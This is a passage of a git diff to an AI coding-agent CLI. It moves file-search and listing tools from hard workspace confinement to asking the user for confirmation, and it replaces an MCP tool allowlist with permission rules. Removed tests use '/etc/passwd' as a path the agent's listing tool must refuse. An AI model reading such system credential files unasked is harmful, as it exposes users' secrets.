b/packages/core/src/tools/glob.ts @@ -12,6 +12,7 @@ import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { ToolNames, ToolDisplayNames } from './tool-names.js'; import { resolveAndValidatePath } from '../utils/paths.js'; import { type Config } from '../config/config.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { DEFAULT_FILE_FILTERING_OPTIONS, type FileFilteringOptions, @@ -99,12 +100,32 @@ class GlobToolInvocation extends BaseToolInvocation< return description; } + /** + * Returns 'ask' for paths outside the workspace, so that external glob + * searches require user confirmation. + */ + override async getDefaultPermission(): Promise { + if (!this.params.path) { + return 'allow'; // Default workspace directory + } + const workspaceContext = this.config.getWorkspaceContext(); + const resolvedPath = path.resolve( + this.config.getTargetDir(), + this.params.path, + ); + if (workspaceContext.isPathWithinWorkspace(resolvedPath)) { + return 'allow'; + } + return 'ask'; + } + async execute(signal: AbortSignal): Promise { try { // Default to target directory if no path is provided const searchDirAbs = resolveAndValidatePath( this.config, this.params.path, + { allowExternalPaths: true }, ); const searchLocationDescription = this.params.path ? `within ${searchDirAbs}` @@ -279,7 +300,9 @@ export class GlobTool extends BaseDeclarativeTool { // Only validate path if one is provided if (params.path) { try { - resolveAndValidatePath(this.config, params.path); + resolveAndValidatePath(this.config, params.path, { + allowExternalPaths: true, + }); } catch (error) { return getErrorMessage(error); } diff --git a/packages/core/src/tools/grep.ts b/packages/core/src/tools/grep.ts index b8ce6d54f..25104ccab 100644 --- a/packages/core/src/tools/grep.ts +++ b/packages/core/src/tools/grep.ts @@ -19,6 +19,7 @@ import { resolveAndValidatePath } from '../utils/paths.js'; import { getErrorMessage, isNodeError } from '../utils/errors.js'; import { isGitRepository } from '../utils/gitUtils.js'; import type { Config } from '../config/config.js'; +import type { PermissionDecision } from '../permissions/types.js'; import type { FileExclusions } from '../utils/ignorePatterns.js'; import { ToolErrorType } from './tool-error.js'; import { isCommandAvailable } from '../utils/shell-utils.js'; @@ -73,12 +74,32 @@ class GrepToolInvocation extends BaseToolInvocation< this.fileExclusions = config.getFileExclusions(); } + /** + * Returns 'ask' for paths outside the workspace, so that external grep + * searches require user confirmation. + */ + override async getDefaultPermission(): Promise { + if (!this.params.path) { + return 'allow'; // Default workspace directory + } + const workspaceContext = this.config.getWorkspaceContext(); + const resolvedPath = path.resolve( + this.config.getTargetDir(), + this.params.path, + ); + if (workspaceContext.isPathWithinWorkspace(resolvedPath)) { + return 'allow'; + } + return 'ask'; + } + async execute(signal: AbortSignal): Promise { try { // Default to target directory if no path is provided const searchDirAbs = resolveAndValidatePath( this.config, this.params.path, + { allowExternalPaths: true }, ); const searchDirDisplay = this.params.path || '.'; @@ -553,7 +574,9 @@ export class GrepTool extends BaseDeclarativeTool { // Only validate path if one is provided if (params.path) { try { - resolveAndValidatePath(this.config, params.path); + resolveAndValidatePath(this.config, params.path, { + allowExternalPaths: true, + }); } catch (error) { return getErrorMessage(error); } diff --git a/packages/core/src/tools/ls.test.ts b/packages/core/src/tools/ls.test.ts index da6273eb1..445092a6d 100644 --- a/packages/core/src/tools/ls.test.ts +++ b/packages/core/src/tools/ls.test.ts @@ -43,7 +43,7 @@ describe('LSTool', () => { }), getTruncateToolOutputLines: () => 1000, storage: { - getUserSkillsDir: () => userSkillsBase, + getUserSkillsDirs: () => [userSkillsBase], }, } as unknown as Config; @@ -71,10 +71,9 @@ describe('LSTool', () => { ); }); - it('should reject paths outside workspace with clear error message', () => { - expect(() => lsTool.build({ path: '/etc/passwd' })).toThrow( - `Path must be within one of the workspace directories: ${tempRootDir}, ${tempSecondaryDir}`, - ); + it('should allow paths outside workspace (external path support)', () => { + const invocation = lsTool.build({ path: '/etc' }); + expect(invocation).toBeDefined(); }); it('should accept paths in secondary workspace directory', async () => { @@ -87,6 +86,20 @@ describe('LSTool', () => { }); }); + describe('getDefaultPermission', () => { + it('should return allow for paths within workspace', async () => { + const invocation = lsTool.build({ path: tempRootDir }); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('allow'); + }); + + it('should return ask for paths outside workspace', async () => { + const invocation = lsTool.build({ path: '/tmp' }); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + }); + }); + describe('execute', () => { it('should list files in a directory', async () => { await fs.writeFile(path.join(tempRootDir, 'file1.txt'), 'content1'); @@ -361,11 +374,10 @@ describe('LSTool', () => { expect(lsTool.build(params)).toBeDefined(); }); - it('should reject paths outside all workspace directories', () => { - const params = { path: '/etc/passwd' }; - expect(() => lsTool.build(params)).toThrow( - 'Path must be within one of the workspace directories', - ); + it('should allow paths outside all workspace directories (external path support)', () => { + const params = { path: '/etc' }; + const invocation = lsTool.build(params); + expect(invocation).toBeDefined(); }); it('should list files from secondary workspace directory', async () => { diff --git a/packages/core/src/tools/ls.ts b/packages/core/src/tools/ls.ts index 877a1274b..2d228bff0 100644 --- a/packages/core/src/tools/ls.ts +++ b/packages/core/src/tools/ls.ts @@ -9,12 +9,14 @@ import path from 'node:path'; import type { ToolInvocation, ToolResult } from './tools.js'; import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { makeRelative, shortenPath } from '../utils/paths.js'; -import { isSubpath } from '../utils/paths.js'; +import { isSubpaths, isSubpath } from '../utils/paths.js'; import type { Config } from '../config/config.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { DEFAULT_FILE_FILTERING_OPTIONS } from '../config/constants.js'; import { ToolErrorType } from './tool-error.js'; import { ToolDisplayNames, ToolNames } from './tool-names.js'; import { createDebugLogger } from '../utils/debugLogger.js'; +import { Storage } from '../config/storage.js'; const debugLogger = createDebugLogger('LS'); @@ -117,6 +119,26 @@ class LSToolInvocation extends BaseToolInvocation { return shortenPath(relativePath); } + /** + * Returns 'ask' for paths outside the workspace/userSkills directories, + * so that external directory listings require user confirmation. + */ + override async getDefaultPermission(): Promise { + const dirPath = path.resolve(this.params.path); + const workspaceContext = this.config.getWorkspaceContext(); + const userSkillsDirs = this.config.storage.getUserSkillsDirs(); + const userExtensionsDir = Storage.getUserExtensionsDir(); + + if ( + workspaceContext.isPathWithinWorkspace(dirPath) || + isSubpaths(userSkillsDirs, dirPath) || + isSubpath(userExtensionsDir, dirPath) + ) { + return 'allow'; + } + return 'ask'; + } + // Helper for consistent error formatting private errorResult( llmContent: string, @@ -335,19 +357,6 @@ export class LSTool extends BaseDeclarativeTool { return `Path must be absolute: ${params.path}`; } - const userSkillsBase = this.config.storage.getUserSkillsDir(); - const isUnderUserSkills = isSubpath(userSkillsBase, params.path); - - const workspaceContext = this.config.getWorkspaceContext(); - if ( - !workspaceContext.isPathWithinWorkspace(params.path) && - !isUnderUserSkills - ) { - const directories = workspaceContext.getDirectories(); - return `Path must be within one of the workspace directories: ${directories.join( - ', ', - )}`; - } return null; } diff --git a/packages/core/src/tools/mcp-tool.test.ts b/packages/core/src/tools/mcp-tool.test.ts index 005623afe..9d850ad68 100644 --- a/packages/core/src/tools/mcp-tool.test.ts +++ b/packages/core/src/tools/mcp-tool.test.ts @@ -18,6 +18,8 @@ import { ToolConfirmationOutcome } from './tools.js'; import type { CallableTool, Part } from '@google/genai'; import { ToolErrorType } from './tool-error.js'; +vi.mock('node:fs/promises'); + // Mock @google/genai mcpToTool and CallableTool // We only need to mock the parts of CallableTool that DiscoveredMCPTool uses. const mockCallTool = vi.fn(); @@ -85,9 +87,6 @@ describe('DiscoveredMCPTool', () => { baseDescription, inputSchema, ); - // Clear allowlist before each relevant test, especially for shouldConfirmExecute - const invocation = tool.build({ param: 'mock' }) as any; - invocation.constructor.allowlist.clear(); }); afterEach(() => { @@ -147,7 +146,7 @@ describe('DiscoveredMCPTool', () => { expect(toolResult.returnDisplay).toBe(stringifiedResponseContent); }); - it('should handle empty result from getStringifiedResultForDisplay', async () => { + it('should handle empty result from getDisplayFromParts', async () => { const params = { param: 'testValue' }; const mockMcpToolResponsePartsEmpty: Part[] = []; mockCallTool.mockResolvedValue(mockMcpToolResponsePartsEmpty); @@ -155,7 +154,9 @@ describe('DiscoveredMCPTool', () => { const toolResult: ToolResult = await invocation.execute( new AbortController().signal, ); - expect(toolResult.returnDisplay).toBe('```json\n[]\n```'); + expect(toolResult.returnDisplay).toBe( + '[Error: Could not parse tool response]', + ); expect(toolResult.llmContent).toEqual([ { text: '[Error: Could not parse tool response]' }, ]); @@ -339,7 +340,9 @@ describe('DiscoveredMCPTool', () => { }, }, ]); - expect(toolResult.returnDisplay).toBe('[Audio: audio/mp3]'); + expect(toolResult.returnDisplay).toBe( + `[Tool '${serverToolName}' provided the following audio data with mime-type: audio/mp3]\n[audio/mp3]`, + ); }); it('should handle a ResourceLinkBlock response', async () => { @@ -372,7 +375,7 @@ describe('DiscoveredMCPTool', () => { }, ]); expect(toolResult.returnDisplay).toBe( - '[Link to My Resource: file:///path/to/thing]', + 'Resource Link: My Resource at file:///path/to/thing', ); }); @@ -446,7 +449,7 @@ describe('DiscoveredMCPTool', () => { }, ]); expect(toolResult.returnDisplay).toBe( - '[Embedded Resource: application/octet-stream]', + `[Tool '${serverToolName}' provided the following embedded resource with mime-type: application/octet-stream]\n[application/octet-stream]`, ); }); @@ -489,7 +492,7 @@ describe('DiscoveredMCPTool', () => { { text: 'Second part.' }, ]); expect(toolResult.returnDisplay).toBe( - 'First part.\n[Image: image/jpeg]\nSecond part.', + `First part.\n[Tool '${serverToolName}' provided the following image data with mime-type: image/jpeg]\n[image/jpeg]\nSecond part.`, ); }); @@ -514,9 +517,7 @@ describe('DiscoveredMCPTool', () => { const toolResult = await invocation.execute(new AbortController().signal); expect(toolResult.llmContent).toEqual([{ text: 'Valid part.' }]); - expect(toolResult.returnDisplay).toBe( - 'Valid part.\n[Unknown content type: future_block]', - ); + expect(toolResult.returnDisplay).toBe('Valid part.'); }); it('should handle a complex mix of content block types', async () => { @@ -574,7 +575,7 @@ describe('DiscoveredMCPTool', () => { }, ]); expect(toolResult.returnDisplay).toBe( - 'Here is a resource.\n[Link to My Resource: file:///path/to/resource]\nEmbedded text content.\n[Image: image/jpeg]', + `Here is a resource.\nResource Link: My Resource at file:///path/to/resource\nEmbedded text content.\n[Tool '${serverToolName}' provided the following image data with mime-type: image/jpeg]\n[image/jpeg]`, ); }); @@ -734,8 +735,8 @@ describe('DiscoveredMCPTool', () => { }); }); - describe('shouldConfirmExecute', () => { - it('should return false if trust is true', async () => { + describe('getDefaultPermission and getConfirmationDetails', () => { + it('should return ask even if trust is true and folder is trusted (trust logic moved to PM)', async () => { const trustedTool = new DiscoveredMCPTool( mockCallableToolInstance, serverName, @@ -747,159 +748,67 @@ describe('DiscoveredMCPTool', () => { { isTrustedFolder: () => true } as any, ); const invocation = trustedTool.build({ param: 'mock' }); - expect( - await invocation.shouldConfirmExecute(new AbortController().signal), - ).toBe(false); + expect(await invocation.getDefaultPermission()).toBe('ask'); }); - it('should return false if server is allowlisted', async () => { - const invocation = tool.build({ param: 'mock' }) as any; - invocation.constructor.allowlist.add(serverName); - expect( - await invocation.shouldConfirmExecute(new AbortController().signal), - ).toBe(false); - }); - - it('should return false if tool is allowlisted', async () => { - const toolAllowlistKey = `${serverName}.${serverToolName}`; - const invocation = tool.build({ param: 'mock' }) as any; - invocation.constructor.allowlist.add(toolAllowlistKey); - expect( - await invocation.shouldConfirmExecute(new AbortController().signal), - ).toBe(false); - }); - - it('should return confirmation details if not trusted and not allowlisted', async () => { + it('should return ask if not trusted', async () => { const invocation = tool.build({ param: 'mock' }); - const confirmation = await invocation.shouldConfirmExecute( + expect(await invocation.getDefaultPermission()).toBe('ask'); + }); + + it('should return confirmation details when permission is ask', async () => { + const invocation = tool.build({ param: 'mock' }); + expect(await invocation.getDefaultPermission()).toBe('ask'); + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - expect(confirmation).not.toBe(false); - if (confirmation && confirmation.type === 'mcp') { - // Type guard for ToolMcpConfirmationDetails - expect(confirmation.type).toBe('mcp'); + expect(confirmation.type).toBe('mcp'); + if (confirmation.type === 'mcp') { expect(confirmation.serverName).toBe(serverName); expect(confirmation.toolName).toBe(serverToolName); - } else if (confirmation) { - // Handle other possible confirmation types if necessary, or strengthen test if only MCP is expected - throw new Error( - 'Confirmation was not of expected type MCP or was false', - ); - } else { - throw new Error( - 'Confirmation details not in expected format or was false', - ); } }); - it('should add server to allowlist on ProceedAlwaysServer', async () => { - const invocation = tool.build({ param: 'mock' }) as any; - const confirmation = await invocation.shouldConfirmExecute( + it('should have onConfirm as a no-op', async () => { + const invocation = tool.build({ param: 'mock' }); + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - expect(confirmation).not.toBe(false); + expect(confirmation).toHaveProperty('onConfirm'); if ( - confirmation && - typeof confirmation === 'object' && 'onConfirm' in confirmation && typeof confirmation.onConfirm === 'function' ) { + // onConfirm should not throw for any outcome await confirmation.onConfirm( - ToolConfirmationOutcome.ProceedAlwaysServer, + ToolConfirmationOutcome.ProceedAlwaysProject, ); - expect(invocation.constructor.allowlist.has(serverName)).toBe(true); - } else { - throw new Error( - 'Confirmation details or onConfirm not in expected format', - ); - } - }); - - it('should add tool to allowlist on ProceedAlwaysTool', async () => { - const toolAllowlistKey = `${serverName}.${serverToolName}`; - const invocation = tool.build({ param: 'mock' }) as any; - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).not.toBe(false); - if ( - confirmation && - typeof confirmation === 'object' && - 'onConfirm' in confirmation && - typeof confirmation.onConfirm === 'function' - ) { - await confirmation.onConfirm(ToolConfirmationOutcome.ProceedAlwaysTool); - expect(invocation.constructor.allowlist.has(toolAllowlistKey)).toBe( - true, - ); - } else { - throw new Error( - 'Confirmation details or onConfirm not in expected format', - ); - } - }); - - it('should handle Cancel confirmation outcome', async () => { - const invocation = tool.build({ param: 'mock' }) as any; - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).not.toBe(false); - if ( - confirmation && - typeof confirmation === 'object' && - 'onConfirm' in confirmation && - typeof confirmation.onConfirm === 'function' - ) { - // Cancel should not add anything to allowlist + await confirmation.onConfirm(ToolConfirmationOutcome.ProceedAlwaysUser); await confirmation.onConfirm(ToolConfirmationOutcome.Cancel); - expect(invocation.constructor.allowlist.has(serverName)).toBe(false); - expect( - invocation.constructor.allowlist.has( - `${serverName}.${serverToolName}`, - ), - ).toBe(false); - } else { - throw new Error( - 'Confirmation details or onConfirm not in expected format', - ); + await confirmation.onConfirm(ToolConfirmationOutcome.ProceedOnce); } }); - it('should handle ProceedOnce confirmation outcome', async () => { - const invocation = tool.build({ param: 'mock' }) as any; - const confirmation = await invocation.shouldConfirmExecute( + it('should include permissionRules with mcp__server__tool format', async () => { + const invocation = tool.build({ param: 'mock' }); + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - expect(confirmation).not.toBe(false); - if ( - confirmation && - typeof confirmation === 'object' && - 'onConfirm' in confirmation && - typeof confirmation.onConfirm === 'function' - ) { - // ProceedOnce should not add anything to allowlist - await confirmation.onConfirm(ToolConfirmationOutcome.ProceedOnce); - expect(invocation.constructor.allowlist.has(serverName)).toBe(false); - expect( - invocation.constructor.allowlist.has( - `${serverName}.${serverToolName}`, - ), - ).toBe(false); - } else { - throw new Error( - 'Confirmation details or onConfirm not in expected format', - ); + expect(confirmation.type).toBe('mcp'); + if (confirmation.type === 'mcp') { + expect(confirmation.permissionRules).toEqual([ + `mcp__${serverName}__${serverToolName}`, + ]); } }); }); - describe('shouldConfirmExecute with folder trust', () => { + describe('getDefaultPermission with folder trust', () => { const mockConfig = (isTrusted: boolean | undefined) => ({ isTrustedFolder: () => isTrusted, }); - it('should return false if trust is true and folder is trusted', async () => { + it('should return ask even if trust is true and folder is trusted (trust logic moved to PM)', async () => { const trustedTool = new DiscoveredMCPTool( mockCallableToolInstance, serverName, @@ -911,12 +820,10 @@ describe('DiscoveredMCPTool', () => { mockConfig(true) as any, // isTrustedFolder = true ); const invocation = trustedTool.build({ param: 'mock' }); - expect( - await invocation.shouldConfirmExecute(new AbortController().signal), - ).toBe(false); + expect(await invocation.getDefaultPermission()).toBe('ask'); }); - it('should return confirmation details if trust is true but folder is not trusted', async () => { + it('should return ask if trust is true but folder is not trusted', async () => { const trustedTool = new DiscoveredMCPTool( mockCallableToolInstance, serverName, @@ -928,14 +835,10 @@ describe('DiscoveredMCPTool', () => { mockConfig(false) as any, // isTrustedFolder = false ); const invocation = trustedTool.build({ param: 'mock' }); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).not.toBe(false); - expect(confirmation).toHaveProperty('type', 'mcp'); + expect(await invocation.getDefaultPermission()).toBe('ask'); }); - it('should return confirmation details if trust is false, even if folder is trusted', async () => { + it('should return ask if trust is false, even if folder is trusted', async () => { const untrustedTool = new DiscoveredMCPTool( mockCallableToolInstance, serverName, @@ -947,11 +850,7 @@ describe('DiscoveredMCPTool', () => { mockConfig(true) as any, // isTrustedFolder = true ); const invocation = untrustedTool.build({ param: 'mock' }); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).not.toBe(false); - expect(confirmation).toHaveProperty('type', 'mcp'); + expect(await invocation.getDefaultPermission()).toBe('ask'); }); }); @@ -964,6 +863,223 @@ describe('DiscoveredMCPTool', () => { }); }); + describe('output truncation for large MCP results', () => { + const THRESHOLD = 1000; + const TRUNCATE_LINES = 50; + + const mockConfigWithTruncation = { + getTruncateToolOutputThreshold: () => THRESHOLD, + getTruncateToolOutputLines: () => TRUNCATE_LINES, + getUsageStatisticsEnabled: () => false, + storage: { + getProjectTempDir: () => '/tmp/test-project', + }, + isTrustedFolder: () => true, + } as any; + + it('should truncate large text results from direct client execution', async () => { + const largeText = 'Line of text content\n'.repeat(200); // ~4200 chars, well over THRESHOLD + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [{ type: 'text', text: largeText }], + })), + }; + + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, // trust + undefined, + mockConfigWithTruncation, + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + // The text part in llmContent should be truncated + const textParts = (result.llmContent as Part[]).filter( + (p: Part) => p.text, + ); + const combinedText = textParts.map((p: Part) => p.text).join(''); + expect(combinedText.length).toBeLessThan(largeText.length); + expect(combinedText).toContain('CONTENT TRUNCATED'); + expect(result.returnDisplay).toContain('CONTENT TRUNCATED'); + }); + + it('should truncate large text results from callable tool execution', async () => { + const largeText = 'Line of text content\n'.repeat(200); + const mockMcpToolResponseParts: Part[] = [ + { + functionResponse: { + name: serverToolName, + response: { + content: [{ type: 'text', text: largeText }], + }, + }, + }, + ]; + mockCallTool.mockResolvedValue(mockMcpToolResponseParts); + + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, + undefined, + mockConfigWithTruncation, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + const textParts = (result.llmContent as Part[]).filter( + (p: Part) => p.text, + ); + const combinedText = textParts.map((p: Part) => p.text).join(''); + expect(combinedText.length).toBeLessThan(largeText.length); + expect(combinedText).toContain('CONTENT TRUNCATED'); + expect(result.returnDisplay).toContain('CONTENT TRUNCATED'); + }); + + it('should not truncate small text results', async () => { + const smallText = 'Small response'; + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [{ type: 'text', text: smallText }], + })), + }; + + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, + undefined, + mockConfigWithTruncation, + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + expect(result.llmContent).toEqual([{ text: smallText }]); + expect(result.returnDisplay).not.toContain('Output too long'); + }); + + it('should not truncate non-text content (images, audio)', async () => { + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [ + { + type: 'image', + data: 'x'.repeat(5000), // large base64 data + mimeType: 'image/png', + }, + ], + })), + }; + + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, + undefined, + mockConfigWithTruncation, + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + // Image data should not be truncated + const inlineDataParts = (result.llmContent as Part[]).filter( + (p: Part) => p.inlineData, + ); + expect(inlineDataParts[0].inlineData!.data).toBe('x'.repeat(5000)); + }); + + it('should truncate only text parts in mixed content', async () => { + const largeText = 'Line of text content\n'.repeat(200); + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [ + { type: 'text', text: largeText }, + { + type: 'image', + data: 'IMAGE_DATA', + mimeType: 'image/png', + }, + ], + })), + }; + + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, + undefined, + mockConfigWithTruncation, + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + const parts = result.llmContent as Part[]; + // Text should be truncated + const textPart = parts.find( + (p: Part) => p.text && !p.text.startsWith('[Tool'), + ); + expect(textPart!.text!.length).toBeLessThan(largeText.length); + expect(textPart!.text).toContain('CONTENT TRUNCATED'); + // Image should be preserved + const imagePart = parts.find((p: Part) => p.inlineData); + expect(imagePart!.inlineData!.data).toBe('IMAGE_DATA'); + }); + + it('should not truncate when config is not provided', async () => { + const largeText = 'Line of text content\n'.repeat(200); + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [{ type: 'text', text: largeText }], + })), + }; + + // No cliConfig provided + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + undefined, + undefined, + undefined, // no config + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + // Without config, should return untouched + expect(result.llmContent).toEqual([{ text: largeText }]); + }); + }); + describe('streaming progress for long-running MCP tools', () => { it('should have canUpdateOutput set to true so the scheduler creates liveOutputCallback', () => { // For long-running MCP tools (e.g., browseruse), the scheduler needs diff --git a/packages/core/src/tools/mcp-tool.ts b/packages/core/src/tools/mcp-tool.ts index 5d48b68c7..44b937633 100644 --- a/packages/core/src/tools/mcp-tool.ts +++ b/packages/core/src/tools/mcp-tool.ts @@ -13,16 +13,14 @@ import type { ToolResultDisplay, ToolConfirmationPayload, McpToolProgressData, -} from './tools.js'; -import { - BaseDeclarativeTool, - BaseToolInvocation, - Kind, ToolConfirmationOutcome, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; +import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import type { CallableTool, FunctionCall, Part } from '@google/genai'; import { ToolErrorType } from './tool-error.js'; import type { Config } from '../config/config.js'; +import { truncateToolOutput } from '../utils/truncation.js'; type ToolParams = Record; @@ -110,8 +108,6 @@ class DiscoveredMCPToolInvocation extends BaseToolInvocation< ToolParams, ToolResult > { - private static readonly allowlist: Set = new Set(); - constructor( private readonly mcpTool: CallableTool, readonly serverName: string, @@ -127,44 +123,43 @@ class DiscoveredMCPToolInvocation extends BaseToolInvocation< super(params); } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { - const serverAllowListKey = this.serverName; - const toolAllowListKey = `${this.serverName}.${this.serverToolName}`; - - if (this.cliConfig?.isTrustedFolder() && this.trust) { - return false; // server is trusted, no confirmation needed - } - - // MCP tools annotated with readOnlyHint: true are safe to execute - // without confirmation, especially important for plan mode support + /** + * MCP tool default permission based on annotations: + * - readOnlyHint → 'allow' + * - All other MCP tools → 'ask' + * + * Note: trust/isTrustedFolder logic is now handled by PM rules, + * not by getDefaultPermission(). + */ + override async getDefaultPermission(): Promise { + // MCP tools annotated with readOnlyHint: true are safe if (this.annotations?.readOnlyHint === true) { - return false; + return 'allow'; } + return 'ask'; + } - if ( - DiscoveredMCPToolInvocation.allowlist.has(serverAllowListKey) || - DiscoveredMCPToolInvocation.allowlist.has(toolAllowListKey) - ) { - return false; // server and/or tool already allowlisted - } + /** + * Constructs confirmation dialog details for an MCP tool call. + */ + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { + // Construct the permission rule for this specific MCP tool. + const permissionRule = `mcp__${this.serverName}__${this.serverToolName}`; const confirmationDetails: ToolMcpConfirmationDetails = { type: 'mcp', title: 'Confirm MCP Tool Execution', serverName: this.serverName, - toolName: this.serverToolName, // Display original tool name in confirmation - toolDisplayName: this.displayName, // Display global registry name exposed to model and user + toolName: this.serverToolName, + toolDisplayName: this.displayName, + permissionRules: [permissionRule], onConfirm: async ( - outcome: ToolConfirmationOutcome, + _outcome: ToolConfirmationOutcome, _payload?: ToolConfirmationPayload, ) => { - if (outcome === ToolConfirmationOutcome.ProceedAlwaysServer) { - DiscoveredMCPToolInvocation.allowlist.add(serverAllowListKey); - } else if (outcome === ToolConfirmationOutcome.ProceedAlwaysTool) { - DiscoveredMCPToolInvocation.allowlist.add(toolAllowListKey); - } + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; @@ -263,10 +258,11 @@ class DiscoveredMCPToolInvocation extends BaseToolInvocation< } const transformedParts = transformMcpContentToParts(rawResponseParts); + const truncatedParts = await this.truncateTextParts(transformedParts); return { - llmContent: transformedParts, - returnDisplay: getStringifiedResultForDisplay(rawResponseParts), + llmContent: truncatedParts, + returnDisplay: getDisplayFromParts(truncatedParts), }; } @@ -333,13 +329,39 @@ class DiscoveredMCPToolInvocation extends BaseToolInvocation< } const transformedParts = transformMcpContentToParts(rawResponseParts); + const truncatedParts = await this.truncateTextParts(transformedParts); return { - llmContent: transformedParts, - returnDisplay: getStringifiedResultForDisplay(rawResponseParts), + llmContent: truncatedParts, + returnDisplay: getDisplayFromParts(truncatedParts), }; } + /** + * Truncates text parts in the transformed result if they exceed the + * configured threshold. Non-text parts (images, audio, etc.) are preserved. + */ + private async truncateTextParts(parts: Part[]): Promise { + if (!this.cliConfig) { + return parts; + } + + const result: Part[] = []; + for (const part of parts) { + if (part.text && !part.inlineData) { + const truncated = await truncateToolOutput( + this.cliConfig, + `mcp__${this.serverName}__${this.serverToolName}`, + part.text, + ); + result.push({ text: truncated.content }); + } else { + result.push(part); + } + } + return result; + } + getDescription(): string { return safeJsonStringify(this.params); } @@ -524,43 +546,22 @@ function transformMcpContentToParts(sdkResponse: Part[]): Part[] { } /** - * Processes the raw response from the MCP tool to generate a clean, - * human-readable string for display in the CLI. It summarizes non-text - * content and presents text directly. - * - * @param rawResponse The raw Part[] array from the GenAI SDK. - * @returns A formatted string representing the tool's output. + * Builds a human-readable display string from transformed Part[]. + * Text parts are shown directly; inline data is summarized by mime type. */ -function getStringifiedResultForDisplay(rawResponse: Part[]): string { - const mcpContent = rawResponse?.[0]?.functionResponse?.response?.[ - 'content' - ] as McpContentBlock[]; - - if (!Array.isArray(mcpContent)) { - return '```json\n' + JSON.stringify(rawResponse, null, 2) + '\n```'; +function getDisplayFromParts(parts: Part[]): string { + if (parts.length === 0) { + return ''; } - const displayParts = mcpContent.map((block: McpContentBlock): string => { - switch (block.type) { - case 'text': - return block.text; - case 'image': - return `[Image: ${block.mimeType}]`; - case 'audio': - return `[Audio: ${block.mimeType}]`; - case 'resource_link': - return `[Link to ${block.title || block.name}: ${block.uri}]`; - case 'resource': - if (block.resource?.text) { - return block.resource.text; - } - return `[Embedded Resource: ${ - block.resource?.mimeType || 'unknown type' - }]`; - default: - return `[Unknown content type: ${(block as { type: string }).type}]`; + const displayParts: string[] = []; + for (const part of parts) { + if (part.text !== undefined) { + displayParts.push(part.text); + } else if (part.inlineData) { + displayParts.push(`[${part.inlineData.mimeType}]`); } - }); + } return displayParts.join('\n'); } diff --git a/packages/core/src/tools/memoryTool.test.ts b/packages/core/src/tools/memoryTool.test.ts index b64837843..7050ab7fe 100644 --- a/packages/core/src/tools/memoryTool.test.ts +++ b/packages/core/src/tools/memoryTool.test.ts @@ -315,29 +315,34 @@ describe('MemoryTool', () => { }); }); - describe('shouldConfirmExecute', () => { + describe('getDefaultPermission and getConfirmationDetails', () => { let memoryTool: MemoryTool; beforeEach(() => { memoryTool = new MemoryTool(); // Mock fs.readFile to return empty string (file doesn't exist) vi.mocked(fs.readFile).mockResolvedValue(''); - - // Clear allowlist before each test to ensure clean state - const invocation = memoryTool.build({ fact: 'test', scope: 'global' }); - // eslint-disable-next-line @typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.clear(); }); - it('should return confirmation details when memory file is not allowlisted for global scope', async () => { + it('should always return ask from getDefaultPermission', async () => { const params = { fact: 'Test fact', scope: 'global' as const }; const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const permission = await invocation.getDefaultPermission(); + + expect(permission).toBe('ask'); + }); + + it('should return confirmation details for global scope', async () => { + const params = { fact: 'Test fact', scope: 'global' as const }; + const invocation = memoryTool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { const expectedPath = path.join('~', '.qwen', 'QWEN.md'); expect(result.title).toBe( `Confirm Memory Save: ${expectedPath} (global)`, @@ -353,15 +358,17 @@ describe('MemoryTool', () => { } }); - it('should return confirmation details when memory file is not allowlisted for project scope', async () => { + it('should return confirmation details for project scope', async () => { const params = { fact: 'Test fact', scope: 'project' as const }; const 